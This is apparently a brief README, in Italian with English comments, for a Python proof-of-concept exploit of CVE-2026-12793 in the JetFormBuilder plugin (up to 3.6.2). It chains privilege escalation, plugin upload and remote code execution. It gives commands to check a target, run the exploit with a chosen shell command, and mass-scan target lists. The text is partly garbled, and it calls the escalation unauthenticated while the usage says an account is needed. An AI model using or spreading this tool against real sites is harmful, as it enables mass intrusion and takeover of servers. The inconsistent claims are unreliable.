
PoC in Python per CVE-2026-12793 in JetFormBuilder <= 3.6.2: escalatione di privilegi non autenticato che porta al caricamento di plugin e all'esecuzione di codice remoto, con modalità di verifica e scansione di massa.
Escalatione di privilegi non autenticata → caricamento del plugin → RCE.
<= 3.6.2>= 3.6.3# Check single target
python poc.py -u https://target.example --mode check
# Full exploit (requires an existing low-privilege account)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# Mass scan
python poc.py -l targets.txt --mode check -t 30